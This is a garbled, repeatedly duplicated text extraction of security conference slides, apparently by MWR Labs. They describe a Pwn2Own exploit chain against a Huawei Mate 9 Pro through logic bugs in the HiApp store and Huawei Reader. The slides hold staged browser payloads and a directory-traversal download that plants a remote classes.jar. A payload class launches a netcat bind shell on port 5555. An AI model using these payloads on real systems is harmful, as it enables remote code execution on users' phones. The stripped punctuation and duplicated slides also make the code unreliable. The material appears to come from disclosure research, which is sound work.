FileSize10000000Ebk3DownloadUrlhttpss3-ap-northeast

1amazonawscom4aaaaaa9q84q87reertw35wy5testzip

DownloadUrlhttpss3-ap-northeast-

1amazonawscomk4aaaaaaertw35wy5testzipVersion2

windowZhangYueJSdo_command(json)

Stage 3

Browse to Website on

Device

BROWSABLE Intent-

WebView

Exported Intent -

WebView

Code Exec and Profit

File Write

Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)

45

public boolean onChapPack(JSONObject arg10)

boolean v0_2

try int v3 = arg10getInt(StartIndex)

int v4 = arg10getInt(EndIndex)

String v2 = arg10getString(Price)

int v1 = arg10getInt(BookId)

String v5 = arg10getString(PayURL)

String v0_1 = arg10getString(DownloadURL)

String v7 = PATHgetBookDir() + arg10getString(FileName)

if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp

DevicegetNetType() = 0xFFFFFFFF)

FILEdelete(PATHgetBookCachePathNamePostfix(v7))

FILEdelete(v7)

Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)

46

public static String getBookNameCheckOpenFail(String arg2)

return PATHgetOpenFailDir() + MD5getMD5(arg2)

public static String getOpenFailDir()

return PATHgetWorkDir() + booksopenfail

Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)

47

5457bea93d0548a4d84357308df45322 =

pluginsDFServiceclassesjar

sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435

7308df45322

sdcardHWiReaderbookspluginsDFServiceclassesjar

Huawei Reader ndash Insecure Plugin Loading

48

public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception

return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null

arg4getClassLoader())loadClass(arg6)

protected final ArrayList P()

if(pR == null)

try PlatForm v3 = new PlatForm()

Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)

+

classesjar

comzhangyueiReaderPlugServiceDocFeature)newInstance()

v2setPlatform(((IPlatform)v3))

pR = ((IPlugDFService)v2)

Huawei Reader ndash Insecure Plugin Loading

49

function download_plugin()

documentwriteln(++ Downloading replacement classesjar ++)

It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2

windowZhangYueJSdo_command(json)

Huawei Reader ndash Payload Creation

50

package comzhangyueiReaderPlugService

import androidutilLog

public class DocFeature

public DocFeature()

comzhangyueiReaderPlugServiceDocFeature

Loge(ATTACKERRUNNING ARBITRARY CODE)

String cmd = datadatacomhuaweihwireaderbusybox

nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh

try

RuntimegetRuntime()exec(cmd)

catch (IOException e)

eprintStackTrace()

Demo

51

Questions

52

Credits

bull Georgi Geshev Rob Miller -

httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-

chrome-on-androidnew-blog-post

53

Whitepaper

54

bull Full whitepaper can be found on the MWR Labs website

(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)

PUBLIC

Page 4: Hacktivity 2018 - F-Secure Labs · Huawei phone switches apps twice. •Often requires a deeper understanding of the application •Automated detection is harder –how do you fuzz

About us

bull James Loureiro (NerdKernel) ndash Head of Security Research MWR primarily

focused on VR and reverse engineering (as well as herding other researchers)

bull Alex Plaskett (alexjplaskett) ndash Offensive security researcher MWR

primarily doing VR (WP7 jailbreak Pwn2Own Safari 2018 mobile security)

3

Background

bull How hard can it be

4

PWN2OWN 2017

5

Huawei Mate 9 Pro

6

PWN2OWN

Execute arbitrary instructionshellip

hellipretrieve sensitive informationhellip

hellipa full sandbox escape is requiredhellip

hellipwithout any user interaction

8

Pwn2Own Categories and Choice

9

PWN2OWN ndash Results

10

PUBLIC

Bug Hunting Approach

Browser attack surface

12

Exploit Mitigation Advancement

bull Memory Safety Mitigations

ndash ASLR PIE RELTO PartitionAlloc

bull Means you need mitigation bypass vulnerabilities too

bull Time consuming debugging memory corruption exploits on a real device

13

Attackers - Positives of Logic Bug Chains

bull Often design issues

ndash Hard to fix (long bug lives)

ndash Increased reliability

bull Architectural agnostic

ndash No problems with shellcode

bull Android IPC specifically is complex as hell

bull Harder to detect

14

Attackers - Negatives of Logic Bug Chains

bull They can get ridiculously long (11 Bugs in S8)

ndash One bug gets fixed and the whole chain is screwed

ndash Usually not particularly stealthy

Samsung phone rebooted

Huawei phone switches apps twice

bull Often requires a deeper understanding of the application

bull Automated detection is harder ndash how do you fuzz for logic bugs

15

Bug Hunting Tips

bull How too prioritise

ndash External Attack Surface (Reachable from browser)

ndash Permissions

Less of an issue for initial foothold

ndash Dangerous words

16

bull Want to rapidly find high risk issues in a large amount of apps

PUBLIC

Tooling and Automation

Toolset (Static vs Dynamic)

bull Android What do we care about

ndash BROWSABLE intents (Need to be web accessible) and Intents

ndash Content we can load into the applications (either via a WebView or Media)

ndash Controlled file writes reads

ndash Unsafe class loading

18

Increasing the attack surface

How do we get more things accessible

bull Intent Proxy Bugs

bull MITM stuff (SSL weaknesses)

19

Intent Proxy Example

bull Android Vendingbull LaunchUrlHandlerActivity

bull We control the package name and URIfinal Intent a(Intent arg17 b arg18 j arg19)

Intent v2_1Uri v7 = arg17getData()String v8 = v7getQueryParameter(url)String v10 = v7getQueryParameter(id)

hellipif((v5) ampamp (v12))

v2_1 = new Intent(androidintentactionVIEW)v2_1setData(Uriparse(v8))v2_1setPackage(v10)return v2_1

hellip

Toolset (Static Analysis)

bull Rezord (internal) ndash Mass de-compilation of all apps

bull JEB

bull Grep

21

lsquoJandroidrsquo ndash Static analysis

22

lsquoJandroidrsquo ndash Static analysis

23

lsquoJandroidrsquo ndash Static analysis

bull For more info see Chainspotting Building Exploit Chains with Logic Bugs

slides

httpsinfiltrateconcomarchives[Infiltrate]20Geshev20and20Miller20

-20Logic20Bug20Hunting20in20Chrome20on20Androidpdf

24

Dynamic Analysis Toolset

Global Hook Flexible Requires Root Lightweight

Xposed

Frida

bull Xposedbull Early injection (Zygote)

bull Global hooks across multiple applications

bull Fridabull Quick and easy prototyping

bull Debugging and dynamic analysis of obfuscated code

PUBLIC

Vulnerabilities

Building an Exploit Chain

bull So what do we need to dobull Assuming no memory corruption

bull BROWSABLE Intent URI handler etc

Browse to Website on

Device

Code Exec and Profit

HiApp ndash Huawei Market Place (App Gallery)

29

HiApp ndash Whitelist Bypass (CVE-2018-7931)

30

ltactivity androidconfigChanges=orientation|screenSize

androidlaunchMode=singleTopldquo

androidname=comhuaweiappmarketserviceexternalapiviewThirdApiActi

vity androidtheme=styleloading_activity_stylegt

ltintent-filtergt

ltaction androidname=androidintentactionVIEW gt

ltcategory androidname=androidintentcategoryDEFAULT gt

ltcategory androidname=androidintentcategoryBROWSABLE gt

ltdata androidhost=details androidscheme=appmarket gt

ltdata androidhost=search androidscheme=market gt

ltdata androidhost=avmallcom androidscheme=https gt

ltdata androidhost=comhuaweiappmarket androidscheme=hiapp gtltintent-filtergt

HiApp ndash Whitelist Bypass (CVE-2018-7931)

31

public List b()

if(ba(thisa))

thisa = new ArrayList()

thisaclear()

thisaadd(hicloudcom$)

thisaadd(vmallcom$)

thisaadd(huaweicom$)

Iterator v1 = comhuaweiappmarketservicewhitelistba()iterator()

do If(v1hasNext()) if(v1next()booleanValue()) continue

HiApp ndash stage1html (CVE-2018-7931)

32

documentlocation =hiappcomhuaweiappmarketactivityName=activityUri|webviewactivityampparams=params [ name uri type String value internal_webview name url type String value httpwwwvmallcom8000stage2html ] ampchannelId=1

Stage 1

Browse to Website on

Device

BROWSABLE Intent-

WebView

Code Exec and Profit

HiApp ndash JavaScript Bridge (CVE-2018-7932)

34

thiswebviewgetSettings()setJavaScriptEnabled(true)

thiswebviewrequestFocus()

thiswebviewsetWebViewClient(new InternalWebViewClient(this))

thiswebviewsetWebChromeClient(new

MarketWebChromeClient(this))

thiswebviewgetSettings()setBlockNetworkImage(true)

thiswebviewaddJavascriptInterface(new

HiSpaceObject(thismContext ((JsCallBackOjbect)this) thiswebview) HiSpaceObject)

HiApp ndash JavaScript Bridge (CVE-2018-7932)

35

JavascriptInterface public void launchApp(String arg7 String

arg8)

URISyntaxException v1_1

v0_1 = IntentparseUri(arg8 0)

try v0_1setPackage(arg7)

thismActivitystartActivity(v0_1)

android-app URI Schema

36

httpandroidxrefcom800_r4xrefframeworksbasecorejavaandroidco

ntentIntentjava

android-apppackage_id[scheme[host[path]]][Intent]

android-

appcomexampleappIntentaction=comexampleMY_ACTIONisome_int=

100Ssome_str=helloend

Action comexampleMY_ACTION

Package comexampleapp

Extras some_int=(int)100 some_str=(String)hello

HiApp ndash stage2html (CVE-2018-7932)

37

var pkg = comhuaweihwireader

var uri =

androidapphttpwwwgooglecoukIntentcomponent=comh

uaweihwireadercomzhangyueiReaderonlineuiActivityWeba

ction=comhuaweihwireaderSHOW_DETAILSurl=http192

16813718000stage3htmlend

windowHiSpaceObjectlaunchApp(pkguri)

Stage 2

Browse to Website on

Device

BROWSABLE Intent-

WebView

Exported Intent -

WebView

Code Exec and Profit

Huawei Reader Application

39

Huawei Reader ndash Input Validation (CVE-2017-15308)

40

protected void onCreate(Bundle arg8)

CharSequence v0_1

String v0

CharSequence v1 = null

superonCreate(arg8)

Intent v2 = thisgetIntent()

if(v2 = null) Uri v3 = v2getData()

if(v3 = null) v0 = v3getScheme()

else v0_1 = v1

v0 = v2getStringExtra(url)

if(TextUtilsisEmpty(((CharSequence)v0))) goto label_51 thisloadRefreshUrl(v0)

Huawei Reader ndash Input Validation (CVE-2017-15308)

41

JavascriptInterface public void do_command(String arg9)

String v4 = ((JSONObject)v2_3)getString(Action)

LOGI(js actionName + v4)

JSONObject v5 =

((JSONObject)v2_3)getJSONObject(Data)

if(v4equalsIgnoreCase(onlineReader))

JSProtocolmJSBookProtocolonline(v5) return

if(v4equalsIgnoreCase(readNow))

JSProtocolmJSBookProtocolreadNow(v5) return

Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)

42

public void originalDownload(JSONObject arg19 boolean

arg20 boolean arg21)

v8 = 0

v10 = v4

v4_1 = 0

try

int v13 = v7getInt(Type)

v14 = v7optInt(Version)

v15 = v7optBoolean(getDrmAuth true)

v3 = PATHgetBookDir() + v7getString(FileName)

v2 = v7getInt(FileId)

v6 = v7getString(DownloadUrl)

Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)

43

function download_plugin()

var json =

ActiononlineReaderDataChargingFeeType0OrderUrlhttp192168137180

01aaaaaPrice0

DownloadInfoChapterId1FeeUnit10Type1FileId32532639FileNameplu

ginsDFServiceclassesjar

FileSize10000000Ebk3DownloadUrlhttpss3-ap-northeast

1amazonawscom4aaaaaa9q84q87reertw35wy5testzip

DownloadUrlhttpss3-ap-northeast-

1amazonawscomk4aaaaaaertw35wy5testzipVersion2

windowZhangYueJSdo_command(json)

Stage 3

Browse to Website on

Device

BROWSABLE Intent-

WebView

Exported Intent -

WebView

Code Exec and Profit

File Write

Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)

45

public boolean onChapPack(JSONObject arg10)

boolean v0_2

try int v3 = arg10getInt(StartIndex)

int v4 = arg10getInt(EndIndex)

String v2 = arg10getString(Price)

int v1 = arg10getInt(BookId)

String v5 = arg10getString(PayURL)

String v0_1 = arg10getString(DownloadURL)

String v7 = PATHgetBookDir() + arg10getString(FileName)

if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp

DevicegetNetType() = 0xFFFFFFFF)

FILEdelete(PATHgetBookCachePathNamePostfix(v7))

FILEdelete(v7)

Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)

46

public static String getBookNameCheckOpenFail(String arg2)

return PATHgetOpenFailDir() + MD5getMD5(arg2)

public static String getOpenFailDir()

return PATHgetWorkDir() + booksopenfail

Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)

47

5457bea93d0548a4d84357308df45322 =

pluginsDFServiceclassesjar

sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435

7308df45322

sdcardHWiReaderbookspluginsDFServiceclassesjar

Huawei Reader ndash Insecure Plugin Loading

48

public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception

return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null

arg4getClassLoader())loadClass(arg6)

protected final ArrayList P()

if(pR == null)

try PlatForm v3 = new PlatForm()

Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)

+

classesjar

comzhangyueiReaderPlugServiceDocFeature)newInstance()

v2setPlatform(((IPlatform)v3))

pR = ((IPlugDFService)v2)

Huawei Reader ndash Insecure Plugin Loading

49

function download_plugin()

documentwriteln(++ Downloading replacement classesjar ++)

It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2

windowZhangYueJSdo_command(json)

Huawei Reader ndash Payload Creation

50

package comzhangyueiReaderPlugService

import androidutilLog

public class DocFeature

public DocFeature()

comzhangyueiReaderPlugServiceDocFeature

Loge(ATTACKERRUNNING ARBITRARY CODE)

String cmd = datadatacomhuaweihwireaderbusybox

nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh

try

RuntimegetRuntime()exec(cmd)

catch (IOException e)

eprintStackTrace()

Demo

51

Questions

52

Credits

bull Georgi Geshev Rob Miller -

httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-

chrome-on-androidnew-blog-post

53

Whitepaper

54

bull Full whitepaper can be found on the MWR Labs website

(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)

PUBLIC

Page 5: Hacktivity 2018 - F-Secure Labs · Huawei phone switches apps twice. •Often requires a deeper understanding of the application •Automated detection is harder –how do you fuzz

Background

bull How hard can it be

4

PWN2OWN 2017

5

Huawei Mate 9 Pro

6

PWN2OWN

Execute arbitrary instructionshellip

hellipretrieve sensitive informationhellip

hellipa full sandbox escape is requiredhellip

hellipwithout any user interaction

8

Pwn2Own Categories and Choice

9

PWN2OWN ndash Results

10

PUBLIC

Bug Hunting Approach

Browser attack surface

12

Exploit Mitigation Advancement

bull Memory Safety Mitigations

ndash ASLR PIE RELTO PartitionAlloc

bull Means you need mitigation bypass vulnerabilities too

bull Time consuming debugging memory corruption exploits on a real device

13

Attackers - Positives of Logic Bug Chains

bull Often design issues

ndash Hard to fix (long bug lives)

ndash Increased reliability

bull Architectural agnostic

ndash No problems with shellcode

bull Android IPC specifically is complex as hell

bull Harder to detect

14

Attackers - Negatives of Logic Bug Chains

bull They can get ridiculously long (11 Bugs in S8)

ndash One bug gets fixed and the whole chain is screwed

ndash Usually not particularly stealthy

Samsung phone rebooted

Huawei phone switches apps twice

bull Often requires a deeper understanding of the application

bull Automated detection is harder ndash how do you fuzz for logic bugs

15

Bug Hunting Tips

bull How too prioritise

ndash External Attack Surface (Reachable from browser)

ndash Permissions

Less of an issue for initial foothold

ndash Dangerous words

16

bull Want to rapidly find high risk issues in a large amount of apps

PUBLIC

Tooling and Automation

Toolset (Static vs Dynamic)

bull Android What do we care about

ndash BROWSABLE intents (Need to be web accessible) and Intents

ndash Content we can load into the applications (either via a WebView or Media)

ndash Controlled file writes reads

ndash Unsafe class loading

18

Increasing the attack surface

How do we get more things accessible

bull Intent Proxy Bugs

bull MITM stuff (SSL weaknesses)

19

Intent Proxy Example

bull Android Vendingbull LaunchUrlHandlerActivity

bull We control the package name and URIfinal Intent a(Intent arg17 b arg18 j arg19)

Intent v2_1Uri v7 = arg17getData()String v8 = v7getQueryParameter(url)String v10 = v7getQueryParameter(id)

hellipif((v5) ampamp (v12))

v2_1 = new Intent(androidintentactionVIEW)v2_1setData(Uriparse(v8))v2_1setPackage(v10)return v2_1

hellip

Toolset (Static Analysis)

bull Rezord (internal) ndash Mass de-compilation of all apps

bull JEB

bull Grep

21

lsquoJandroidrsquo ndash Static analysis

22

lsquoJandroidrsquo ndash Static analysis

23

lsquoJandroidrsquo ndash Static analysis

bull For more info see Chainspotting Building Exploit Chains with Logic Bugs

slides

httpsinfiltrateconcomarchives[Infiltrate]20Geshev20and20Miller20

-20Logic20Bug20Hunting20in20Chrome20on20Androidpdf

24

Dynamic Analysis Toolset

Global Hook Flexible Requires Root Lightweight

Xposed

Frida

bull Xposedbull Early injection (Zygote)

bull Global hooks across multiple applications

bull Fridabull Quick and easy prototyping

bull Debugging and dynamic analysis of obfuscated code

PUBLIC

Vulnerabilities

Building an Exploit Chain

bull So what do we need to dobull Assuming no memory corruption

bull BROWSABLE Intent URI handler etc

Browse to Website on

Device

Code Exec and Profit

HiApp ndash Huawei Market Place (App Gallery)

29

HiApp ndash Whitelist Bypass (CVE-2018-7931)

30

ltactivity androidconfigChanges=orientation|screenSize

androidlaunchMode=singleTopldquo

androidname=comhuaweiappmarketserviceexternalapiviewThirdApiActi

vity androidtheme=styleloading_activity_stylegt

ltintent-filtergt

ltaction androidname=androidintentactionVIEW gt

ltcategory androidname=androidintentcategoryDEFAULT gt

ltcategory androidname=androidintentcategoryBROWSABLE gt

ltdata androidhost=details androidscheme=appmarket gt

ltdata androidhost=search androidscheme=market gt

ltdata androidhost=avmallcom androidscheme=https gt

ltdata androidhost=comhuaweiappmarket androidscheme=hiapp gtltintent-filtergt

HiApp ndash Whitelist Bypass (CVE-2018-7931)

31

public List b()

if(ba(thisa))

thisa = new ArrayList()

thisaclear()

thisaadd(hicloudcom$)

thisaadd(vmallcom$)

thisaadd(huaweicom$)

Iterator v1 = comhuaweiappmarketservicewhitelistba()iterator()

do If(v1hasNext()) if(v1next()booleanValue()) continue

HiApp ndash stage1html (CVE-2018-7931)

32

documentlocation =hiappcomhuaweiappmarketactivityName=activityUri|webviewactivityampparams=params [ name uri type String value internal_webview name url type String value httpwwwvmallcom8000stage2html ] ampchannelId=1

Stage 1

Browse to Website on

Device

BROWSABLE Intent-

WebView

Code Exec and Profit

HiApp ndash JavaScript Bridge (CVE-2018-7932)

34

thiswebviewgetSettings()setJavaScriptEnabled(true)

thiswebviewrequestFocus()

thiswebviewsetWebViewClient(new InternalWebViewClient(this))

thiswebviewsetWebChromeClient(new

MarketWebChromeClient(this))

thiswebviewgetSettings()setBlockNetworkImage(true)

thiswebviewaddJavascriptInterface(new

HiSpaceObject(thismContext ((JsCallBackOjbect)this) thiswebview) HiSpaceObject)

HiApp ndash JavaScript Bridge (CVE-2018-7932)

35

JavascriptInterface public void launchApp(String arg7 String

arg8)

URISyntaxException v1_1

v0_1 = IntentparseUri(arg8 0)

try v0_1setPackage(arg7)

thismActivitystartActivity(v0_1)

android-app URI Schema

36

httpandroidxrefcom800_r4xrefframeworksbasecorejavaandroidco

ntentIntentjava

android-apppackage_id[scheme[host[path]]][Intent]

android-

appcomexampleappIntentaction=comexampleMY_ACTIONisome_int=

100Ssome_str=helloend

Action comexampleMY_ACTION

Package comexampleapp

Extras some_int=(int)100 some_str=(String)hello

HiApp ndash stage2html (CVE-2018-7932)

37

var pkg = comhuaweihwireader

var uri =

androidapphttpwwwgooglecoukIntentcomponent=comh

uaweihwireadercomzhangyueiReaderonlineuiActivityWeba

ction=comhuaweihwireaderSHOW_DETAILSurl=http192

16813718000stage3htmlend

windowHiSpaceObjectlaunchApp(pkguri)

Stage 2

Browse to Website on

Device

BROWSABLE Intent-

WebView

Exported Intent -

WebView

Code Exec and Profit

Huawei Reader Application

39

Huawei Reader ndash Input Validation (CVE-2017-15308)

40

protected void onCreate(Bundle arg8)

CharSequence v0_1

String v0

CharSequence v1 = null

superonCreate(arg8)

Intent v2 = thisgetIntent()

if(v2 = null) Uri v3 = v2getData()

if(v3 = null) v0 = v3getScheme()

else v0_1 = v1

v0 = v2getStringExtra(url)

if(TextUtilsisEmpty(((CharSequence)v0))) goto label_51 thisloadRefreshUrl(v0)

Huawei Reader ndash Input Validation (CVE-2017-15308)

41

JavascriptInterface public void do_command(String arg9)

String v4 = ((JSONObject)v2_3)getString(Action)

LOGI(js actionName + v4)

JSONObject v5 =

((JSONObject)v2_3)getJSONObject(Data)

if(v4equalsIgnoreCase(onlineReader))

JSProtocolmJSBookProtocolonline(v5) return

if(v4equalsIgnoreCase(readNow))

JSProtocolmJSBookProtocolreadNow(v5) return

Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)

42

public void originalDownload(JSONObject arg19 boolean

arg20 boolean arg21)

v8 = 0

v10 = v4

v4_1 = 0

try

int v13 = v7getInt(Type)

v14 = v7optInt(Version)

v15 = v7optBoolean(getDrmAuth true)

v3 = PATHgetBookDir() + v7getString(FileName)

v2 = v7getInt(FileId)

v6 = v7getString(DownloadUrl)

Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)

43

function download_plugin()

var json =

ActiononlineReaderDataChargingFeeType0OrderUrlhttp192168137180

01aaaaaPrice0

DownloadInfoChapterId1FeeUnit10Type1FileId32532639FileNameplu

ginsDFServiceclassesjar

FileSize10000000Ebk3DownloadUrlhttpss3-ap-northeast

1amazonawscom4aaaaaa9q84q87reertw35wy5testzip

DownloadUrlhttpss3-ap-northeast-

1amazonawscomk4aaaaaaertw35wy5testzipVersion2

windowZhangYueJSdo_command(json)

Stage 3

Browse to Website on

Device

BROWSABLE Intent-

WebView

Exported Intent -

WebView

Code Exec and Profit

File Write

Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)

45

public boolean onChapPack(JSONObject arg10)

boolean v0_2

try int v3 = arg10getInt(StartIndex)

int v4 = arg10getInt(EndIndex)

String v2 = arg10getString(Price)

int v1 = arg10getInt(BookId)

String v5 = arg10getString(PayURL)

String v0_1 = arg10getString(DownloadURL)

String v7 = PATHgetBookDir() + arg10getString(FileName)

if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp

DevicegetNetType() = 0xFFFFFFFF)

FILEdelete(PATHgetBookCachePathNamePostfix(v7))

FILEdelete(v7)

Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)

46

public static String getBookNameCheckOpenFail(String arg2)

return PATHgetOpenFailDir() + MD5getMD5(arg2)

public static String getOpenFailDir()

return PATHgetWorkDir() + booksopenfail

Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)

47

5457bea93d0548a4d84357308df45322 =

pluginsDFServiceclassesjar

sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435

7308df45322

sdcardHWiReaderbookspluginsDFServiceclassesjar

Huawei Reader ndash Insecure Plugin Loading

48

public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception

return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null

arg4getClassLoader())loadClass(arg6)

protected final ArrayList P()

if(pR == null)

try PlatForm v3 = new PlatForm()

Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)

+

classesjar

comzhangyueiReaderPlugServiceDocFeature)newInstance()

v2setPlatform(((IPlatform)v3))

pR = ((IPlugDFService)v2)

Huawei Reader ndash Insecure Plugin Loading

49

function download_plugin()

documentwriteln(++ Downloading replacement classesjar ++)

It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2

windowZhangYueJSdo_command(json)

Huawei Reader ndash Payload Creation

50

package comzhangyueiReaderPlugService

import androidutilLog

public class DocFeature

public DocFeature()

comzhangyueiReaderPlugServiceDocFeature

Loge(ATTACKERRUNNING ARBITRARY CODE)

String cmd = datadatacomhuaweihwireaderbusybox

nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh

try

RuntimegetRuntime()exec(cmd)

catch (IOException e)

eprintStackTrace()

Demo

51

Questions

52

Credits

bull Georgi Geshev Rob Miller -

httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-

chrome-on-androidnew-blog-post

53

Whitepaper

54

bull Full whitepaper can be found on the MWR Labs website

(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)

PUBLIC

Page 6: Hacktivity 2018 - F-Secure Labs · Huawei phone switches apps twice. •Often requires a deeper understanding of the application •Automated detection is harder –how do you fuzz

PWN2OWN 2017

5

Huawei Mate 9 Pro

6

PWN2OWN

Execute arbitrary instructionshellip

hellipretrieve sensitive informationhellip

hellipa full sandbox escape is requiredhellip

hellipwithout any user interaction

8

Pwn2Own Categories and Choice

9

PWN2OWN ndash Results

10

PUBLIC

Bug Hunting Approach

Browser attack surface

12

Exploit Mitigation Advancement

bull Memory Safety Mitigations

ndash ASLR PIE RELTO PartitionAlloc

bull Means you need mitigation bypass vulnerabilities too

bull Time consuming debugging memory corruption exploits on a real device

13

Attackers - Positives of Logic Bug Chains

bull Often design issues

ndash Hard to fix (long bug lives)

ndash Increased reliability

bull Architectural agnostic

ndash No problems with shellcode

bull Android IPC specifically is complex as hell

bull Harder to detect

14

Attackers - Negatives of Logic Bug Chains

bull They can get ridiculously long (11 Bugs in S8)

ndash One bug gets fixed and the whole chain is screwed

ndash Usually not particularly stealthy

Samsung phone rebooted

Huawei phone switches apps twice

bull Often requires a deeper understanding of the application

bull Automated detection is harder ndash how do you fuzz for logic bugs

15

Bug Hunting Tips

bull How too prioritise

ndash External Attack Surface (Reachable from browser)

ndash Permissions

Less of an issue for initial foothold

ndash Dangerous words

16

bull Want to rapidly find high risk issues in a large amount of apps

PUBLIC

Tooling and Automation

Toolset (Static vs Dynamic)

bull Android What do we care about

ndash BROWSABLE intents (Need to be web accessible) and Intents

ndash Content we can load into the applications (either via a WebView or Media)

ndash Controlled file writes reads

ndash Unsafe class loading

18

Increasing the attack surface

How do we get more things accessible

bull Intent Proxy Bugs

bull MITM stuff (SSL weaknesses)

19

Intent Proxy Example

bull Android Vendingbull LaunchUrlHandlerActivity

bull We control the package name and URIfinal Intent a(Intent arg17 b arg18 j arg19)

Intent v2_1Uri v7 = arg17getData()String v8 = v7getQueryParameter(url)String v10 = v7getQueryParameter(id)

hellipif((v5) ampamp (v12))

v2_1 = new Intent(androidintentactionVIEW)v2_1setData(Uriparse(v8))v2_1setPackage(v10)return v2_1

hellip

Toolset (Static Analysis)

bull Rezord (internal) ndash Mass de-compilation of all apps

bull JEB

bull Grep

21

lsquoJandroidrsquo ndash Static analysis

22

lsquoJandroidrsquo ndash Static analysis

23

lsquoJandroidrsquo ndash Static analysis

bull For more info see Chainspotting Building Exploit Chains with Logic Bugs

slides

httpsinfiltrateconcomarchives[Infiltrate]20Geshev20and20Miller20

-20Logic20Bug20Hunting20in20Chrome20on20Androidpdf

24

Dynamic Analysis Toolset

Global Hook Flexible Requires Root Lightweight

Xposed

Frida

bull Xposedbull Early injection (Zygote)

bull Global hooks across multiple applications

bull Fridabull Quick and easy prototyping

bull Debugging and dynamic analysis of obfuscated code

PUBLIC

Vulnerabilities

Building an Exploit Chain

bull So what do we need to dobull Assuming no memory corruption

bull BROWSABLE Intent URI handler etc

Browse to Website on

Device

Code Exec and Profit

HiApp ndash Huawei Market Place (App Gallery)

29

HiApp ndash Whitelist Bypass (CVE-2018-7931)

30

ltactivity androidconfigChanges=orientation|screenSize

androidlaunchMode=singleTopldquo

androidname=comhuaweiappmarketserviceexternalapiviewThirdApiActi

vity androidtheme=styleloading_activity_stylegt

ltintent-filtergt

ltaction androidname=androidintentactionVIEW gt

ltcategory androidname=androidintentcategoryDEFAULT gt

ltcategory androidname=androidintentcategoryBROWSABLE gt

ltdata androidhost=details androidscheme=appmarket gt

ltdata androidhost=search androidscheme=market gt

ltdata androidhost=avmallcom androidscheme=https gt

ltdata androidhost=comhuaweiappmarket androidscheme=hiapp gtltintent-filtergt

HiApp ndash Whitelist Bypass (CVE-2018-7931)

31

public List b()

if(ba(thisa))

thisa = new ArrayList()

thisaclear()

thisaadd(hicloudcom$)

thisaadd(vmallcom$)

thisaadd(huaweicom$)

Iterator v1 = comhuaweiappmarketservicewhitelistba()iterator()

do If(v1hasNext()) if(v1next()booleanValue()) continue

HiApp ndash stage1html (CVE-2018-7931)

32

documentlocation =hiappcomhuaweiappmarketactivityName=activityUri|webviewactivityampparams=params [ name uri type String value internal_webview name url type String value httpwwwvmallcom8000stage2html ] ampchannelId=1

Stage 1

Browse to Website on

Device

BROWSABLE Intent-

WebView

Code Exec and Profit

HiApp ndash JavaScript Bridge (CVE-2018-7932)

34

thiswebviewgetSettings()setJavaScriptEnabled(true)

thiswebviewrequestFocus()

thiswebviewsetWebViewClient(new InternalWebViewClient(this))

thiswebviewsetWebChromeClient(new

MarketWebChromeClient(this))

thiswebviewgetSettings()setBlockNetworkImage(true)

thiswebviewaddJavascriptInterface(new

HiSpaceObject(thismContext ((JsCallBackOjbect)this) thiswebview) HiSpaceObject)

HiApp ndash JavaScript Bridge (CVE-2018-7932)

35

JavascriptInterface public void launchApp(String arg7 String

arg8)

URISyntaxException v1_1

v0_1 = IntentparseUri(arg8 0)

try v0_1setPackage(arg7)

thismActivitystartActivity(v0_1)

android-app URI Schema

36

httpandroidxrefcom800_r4xrefframeworksbasecorejavaandroidco

ntentIntentjava

android-apppackage_id[scheme[host[path]]][Intent]

android-

appcomexampleappIntentaction=comexampleMY_ACTIONisome_int=

100Ssome_str=helloend

Action comexampleMY_ACTION

Package comexampleapp

Extras some_int=(int)100 some_str=(String)hello

HiApp ndash stage2html (CVE-2018-7932)

37

var pkg = comhuaweihwireader

var uri =

